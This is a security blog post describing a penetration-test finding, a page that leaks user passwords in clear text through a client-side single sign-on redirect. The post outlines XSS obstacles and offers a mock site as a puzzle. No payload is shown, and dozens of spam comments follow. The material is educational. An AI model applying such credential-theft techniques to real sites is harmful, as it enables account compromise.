Monday, February 7, 2011

Tricky exploit - a penetration test puzzle

In a recent application security audit for a web-site I came across a big, blaring breach.
while it's always fun to find a good vulnerability, it turned out to be quite tricky to actually exploit it. The trickiness was not due to good security practices but to pure (un)luck (depending on whose point of view). It seemed every angle I tried was off by just a tiny bit.

Eventually I managed to find an interesting multiphase exploit vector, and I think it makes for some interesting tinkering/reading.  I've created a mock-up replica of the vulnerable web-site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wit against the mock-site and find it yourself, before reading on to the detailed exploit write-up.

The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After login to the client site, the user was shown a menu that contained a link to the printing system. In order to facilitate the user, the link to the printing system from the menu would try to use the previously given credentials from the client login and pass them on to the printing system for authentication. A poor man's SSO so to speak.

The Breach
It turned out that this "facilitating" method would pull the user credentials and post them to the printing system unencrypted via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If successful, a menu is presented (menu.php).
A click on the "Go to Printing" link directs the browser to an intermediate page (printAutoLogin.php) that contained the user credentials in a pre-filled form that is immediately  auto-submitted to the printing system login page (printSystem.php) which checks them for validity.

 Click image to enlarge

Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.

The breach is crucial and apparent: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to the attacker. The only question remaining is, how can he get it??

Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack exploiting it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that gets his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends in place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user credentials. One way to do this would be to obtain the session cookie and use it to access the tell-tale URL impersonating the legitimate user and obtaining his credentials (assuming no IP checks are done). The cookie was set http-only which made this vector harder.

Another option was to get the credentials on the client side (using an xmlhttprequest) and have them sent directly. This would overcome the http-only problem, and would also be much cooler...

In practice XSS flaws were abundant. I found several around the site, but they were all just a bit off. Two were in different sub-domains, so they didn't have the session cookie set, and were prohibited from making cross-(sub)-domain xmlhttp calls. Another XSS was actually in the same sub-domain but used HTTP whereas the rest of the site was in HTTPS, so again no cookie (it was secure) and no cross-protocol calls.

Close but no cigar. Yet.

Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts into a simplified mock-website that you can play around with.

The website home page is:
Valid user credentials are : Name:user123 Password:pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I didn't describe yet to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).

Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.

The detailed exploitation is provided in a separate blog entry.


  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

  2. Awesome! Congratulations!

  3. Yes, How attacker creates "XSS PAYLOAD 2" is not so clear & it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.

  4. Wholesale Sexy Lingerie,High Quality!Low Price! Wholesale Leggings,Plus Size Corsets,Wholesale Halloween Costumes From China Suppliers LingeriePark.Wholesale Only,No Retail!Lingerie China Suppliers
    Wholesale Sexy Lingerie
    Low Price Lingerie
    Lingerie China

  5. I am really enjoying reading your well written articles.
    I think you spend numerous effort and time updating your site. I have bookmarked it and I am taking a look ahead to reading new articles.

  6. Thank you for sharing such a informative post with us, it will beneficial for everyone, It is one of the best sites that I have visited. I am looking forward to read more blogs post from here
    Assignment Help UAE

  7. Thank you for sharing valuable information. Nice post. I enjoyed reading this post. Child Homeopathy Doctor in Jaipur

  8. This is a really super post. Must admit that you are amid the best writer I have read. I appreciate your making the effort to discuss this class of article. Best Homeopathy Doctor in Jaipur

  9. Union advances are conceivable choices to contracting regularly scheduled installments and still assume liability for the obligation.Payday Loans San-diego

  10. In any case, you should know about what you are consenting to and design the reimbursement date so you don't get yourself assist behind.Cash Advance

  11. Thank you for taking the time and sharing this information with us. It was indeed very helpful and insightful while being straight forward and to the point.
    world no 1 assignment help company

  12. Bookmarked your fantastic website. Fabulous work, unique way with words! For more info: Dubai Film Production Companies Corporate Video Production Dubai

  13. It is obligatory, by and large, for the borrower to have a financial records with coordinate store of their paycheck as that is the manner by which the moneylender gets credit installments from the borrower.
    Payday Loans San-diego

    Cash Advance Chicago
    Auto Title Loans Chicago
    Cash AdvancePayday Loans

  14. This most recent pattern offers enormous accommodation to the clients. Check getting the money for machines are an other option to the conventional method for benefit in that they can be found in an assortment of areas and can be utilized specifically by the clients themselves with no help. check cashing san diego

  15. This consistently expanding development is on account of conventional bank credits are not taking care of the requests of entrepreneurs. Cash Advances Chicago

  16. Very interesting blog. Lot of blogs I see these days don’t really provide anything that I’m interested in, but I’m most definitely interested in this one. Thanks a lot for this share!! best essay writing service

  17. Programming Assignment help
    If you are still in a dilemma, you could ask your teacher for some guidance, or you can take Assignment helpfrom different assignment writing service providers. There you can find many online experts, who are all set to help you in your assignment. The proper outline followed by them will give you an idea of how to make your assignment look more presentable and attractive.

  18. Nice post. I was checking continuously this weblog and I am impressed! Extremely helpful information specially the remaining phase ?? I deal with such information a lot. I was seeking this certain info for a very lengthy time. Thank you and best of luck.Kryptowaluty , sprawdz rowniez kursy kryptowalut

  19. I am an academic assignment services provider and Academic Write, associated with since the decade. Sample Assignment is leading plagiarism free assignment help Brisbane Australia, UK, USA. We provide online conflict online assignment help customized assignment help service. We are leading the market for more than a decade now and have acquired the name of being the best academic help service for our comprehensive services at pocket-friendly rates online supply chain online assignment help and We also serve our Service to those who search assignment help Perth.

  20. Thanks for your informative content. It's extremely useful to students for further research and assistance. However, there is an academic assignment help provider that goes by the name TutorVersal, who has been offering various assignment writing services like Essay Help services, report writing services, case study services et cetera. The company has delivered thousands of assignments in which students scored high-distinction grades. They have never let any student down and in addition, offers various essay writing help services in subjects like management, nursing, law, engineering, and more. They constantly strive to provide the best academic solutions at the cheapest price as they know how difficult it is for a student to manage such expenses. Thus, any students who feel helpless in their academic assignments can avail prime assignments services at

  21. Hey, do check out our Cryptography assignment help provided by the subject experts at TutorVersal. We are an online assignment help provider who assists students in overcoming their assignment writing challenges. Our highly qualified team of academic helpers write quality assignments that are 100% plagiarism-free and deliver them right on time. Recently, we launched child care assignment help service, and it has got a favorable response from hundreds of students in Australia who used it. We provide assignment solutions for over 180 subjects such as management, economics, nursing, engineering, and more. You can easily get your essays, dissertations, and case study assignments solved by us and score excellent grades in them!

  22. Thank you for making me understand about how an expert assist student with Nursing assignment help by going through many writing formats of assignments such as essays, reports, thesis, articles and many more. Likewise, there exist one such company as Online Assignment Expert that provides top quality assignments at affordable prices. We at Online assignment Expert provide world class feature of on-time assignment delivery, plagiarism check, partial payment, unlimited revisions, etc. You can contact our team of highly professional and experienced experts engaged in their respective field. Avail our exclusive discounts on our nursing case study assignment help by contacting our experts at Online Assignment Expert.

  23. This is a highly informative article! Our MATLAB assignment help experts also work towards one goal, i.e., allowing students to overcome their assignment writing challenges. TutorVersal is an online assignment service provider who assists students in completing their MATLAB assessments and even score excellent grades in these writing tasks. One of the major challenges that most computer science students face today is the complexity of their assignment’s guidelines and requirements, which may be beyond their level of understanding. But with our academic guidance, they do not have to worry about such an issue. Every team, including our bioinformatics assignment help experts, ensure that students get a properly-written assignment, which is exactly as per their guidelines and marking rubric. We also guarantee maximum customer satisfaction and timely-delivery of their work.

  24. Hello. Thank you for the informative content that you have provided. However, I would like to recommended highly professional assignment help services that are being offered by My Assignment Help Oz. Few years back, me and my friend needed ‘my assignment help Australia’ and were having no luck with assignment requirements and structures.
    That is when, some of my friends recommended me about MAHOZ and how premium their assignment help services are.
    We chose their help my assignment services and ended up scoring more than 95% in our final academic grades.
    They turned out to be the real saviors for us.

  25. All the students who are looking for a case study assignment help, please pay attention. My Assignment Services is a destination that thousands of students turn to when they are in need of an expert consultation. The team of experts delivering assignment help to the students are either master’s degree holders of have PhD doctorate. Therefore, every assignment that we have ever written is of supreme quality and international standard for global competition. Students who are searching for companies with “who can do my assignment for me”, My Assignment Services is your destination. We have an expertise when it comes to writing original and unique answers and deliver the work under strict deadline on time. The case study assignment help with us is a service prepared keeping in mind the needs of the students. An affordable assignment help from best experts is now available!

  26. A special thanks to Assignment Help Australia for providing an exceptional assignment within a short period of time. Your work is really amazing. Hope you reach heights in the future. You can email us at cs@Myassignmenthelpau.Com or Phone Number: +61-2-8005-8227

  27. Very nice blog and articles. I am really very happy to visit your blog. Now I am found which I actually want. I check your blog everyday and try to learn something from your blog. Thank you and waiting for your new post. My Assignment help

  28. Hi! It goes without saying that not everyone can make a perfect university assignment. In such cases students ask for help online writing assignments. I recommend you this one. They will provide you with a quality project within the limited time.

  29. That's very cool teaching and evaluation method for inspiring kid creative and dynamic. Thanks so much for sharing.
    hotmail login account

  30. Sample Assignment bestows over the college going students with online assignment help. It is a consultancy possessing academic experts providing a number of subject-specific assignment helps. Management assignment help, economics assignment help, MATLAB assignment Help, MySQL assignment help, marketing assignment help, etc. are a few to name. The assignment help packages that they supply the students with ensure the students receive an HD or a full money back. With their assignment consultation services, the students can learn by exposing themselves to out-of-the-box learning when it comes to module related studies. For the quality of the in-depth research that is conducted before the experts at Sample Assignment lay their hands on a specific assignment, the prices are kept very close to the ground while the company has its head touching the sky. They offer services in Essays, CDRs, Resumes, Thesis, Research Proposals, Research Papers, Dissertations, etc. Be it any of the above, they provide ready to study from assignment solutions to the students who work-save in order to pay for the service and the online assignment services provider works on the motive of giving out value for every coin a particular student pays for the online assignment help Australia. With their Partial Payment and the optional feature of Countless Revisions, they have earned themselves two consecutive years of recognition.





  31. The first step in custom dissertation writing is the choice of topic. The topic that is chosen by the writer determines the quality of the paper. Contact our research papers 247 company today!

  32. Your post is good and informative. If you are looking for the best assignment help online, you can contact us. We will provide timely assignment writing services at an affordable cost, and will also provide this service for all topics.


  33. Gotoessayhelp is a round the clock essay help service which caters solutions request to various subjects’ tools & methodology in a multi environment learning concept for the subjects like clock essay helper. We are a renowned service provider of essay assignment help and have been receiving an overwhelmed response globally.
    We offer plagiarism free, original content to our clients and facilitated are clients to grow their career by using the services of our proven Ph.D. experts, as we understand how important grades for students within their academic purview. u will experience a hassle-free service and top-class quality.

  34. Want to give your business a kick-start? Wonder mouse technologies, India’s fastest growing web development company in noida platform brings you unparalleled web development company in delhi, mobile app development, android app development services, that too in an affordable price quote. A group of young enthusiasts are here to cater for your success by providing all round business development help. Hundreds for well-tested strategies are implemented after measuring the current market for significant future growth.


  35. A high-level post with a piece of knowledgeable information.Thank you for sharing such information.
    if you need any academic level Assignment Help at reliable quality with better work.
    kindly visit us or WhatsApp +61 2 80113341

  36. ويتأثر المنزل في فصل الصيف أيضاً عندما يتعرض لفترات طويلة من الوقت لأشعة الشمس فيتسرب هذه الحرارة إلى الداخل وتأثر على مناخ المنزل والحرارة العالية
    شركه عزل فوم بالرياض

    أيضاً تسبب في سقوط الطلاء وظهور التشققات، ولكن من الآن لا داعي

    شركه تنظيف منازل بالدمام
    للقلق لأن شركة عزل أسطح تقدم لعملائها الكرام في كافة أنحاء المملكة العربية السعودية .
    افضل شركة عزل أسطح

    شركه تنظيف مكيفات بالرياض
    شركه عزل فوم بالدمام

    شركه عزل اسطح بالدمام

    شركه عزل فوم بالقطيف

    شركه عزل فوم بالاحساء

    شركه عزل فوم بالجبيل

  37. Our Buy Custom Essay Service Online is normally written by professionals who have sufficient experience in writing academic papers in any discipline. Our customer service is available 24/7, which makes it easy for clients to place orders and receive their Online Custom Essay Writing Services on time.

  38. At Assignment Studio we have a team of professional who are devoted to academic excellence and providing premium academic papers and consultation that are completed according to your Law Assignment Help needs.
    For further information queries visit our website law assignment

  39. Every single college or university student is required to complete number of different homework projects. Meeting the deadlines of their homework is never easy as they not only have to complete one assignment, instead they are bombarded with number of different assignments.
    For further information queries visit our website homework help

  40. Myassignmenthelpau is an ideal platform for every student who requires Marketing Assignment Help with their academic assignments. If a student doesn’t know how to get high-quality assignment help then this is one such platform that provides the best Marketing Assignment Help in Australia.

  41. عزل اسطح بالدمام لحماية وزيادة عمر الخزان الافتراضي.

    شركه عزل فوم بالدمام عزل فوم

  42. Book Allegiant Airlines Discount Flights now from Alternative Airlines with More Choice & Better Prices. We cover deals across all routes from US departure airports & from all major carriers. Contact us at 1-800-801-9708 for more information. Grab your deals with Cheap Allegiant Airlines Flights Booking Deals if you are passionate about real adventures, the freezing peaks and steaming jungles, crashing waves and raging rivers. We believe that everybody should have the opportunity to travel at least once in their life, it is for everyone and therefore we make it affordable for everyone.

  43. Assignment Help is something most students are actively and constantly searching for assignment writing, regardless of their academic level. Students who lack knowledge and skills to develop proper assignment writing fears hearing the writing of word assignments. online assignment help is all you need to relieve the tension in these circumstances. By that point, the writing of the assignment is just what you need. They provide 100 per cent positive outcomes to customers, including providing expert advice and services. We offer top service assignment help Australia by 1000+ native experts with record of on time delivery. Get your modification done online for any subject assignment. Securing high grades made easy with assignment help.

  44. Hello! I just would like to give a huge thumbs up for the great info you have here on this post. I will be coming back to your blog for more soon.

    Click Here
    Visit Web

  45. Oh my goodness! an amazing article dude. Thank you However I am experiencing issue with ur rss. Don’t know why Unable to subscribe to it. Is there anyone getting identical rss problem? Anyone who knows kindly respond. Thnkx

    Click Here
    Visit Web

  46. ABC Assignment Help is an incomparable online Online assignment help company delivering excellent academic assignments, essays, coursework and reports. Through a team of over 3000 subject experts we ensure individual attention to every student making the assignment help experience completely personalized in nature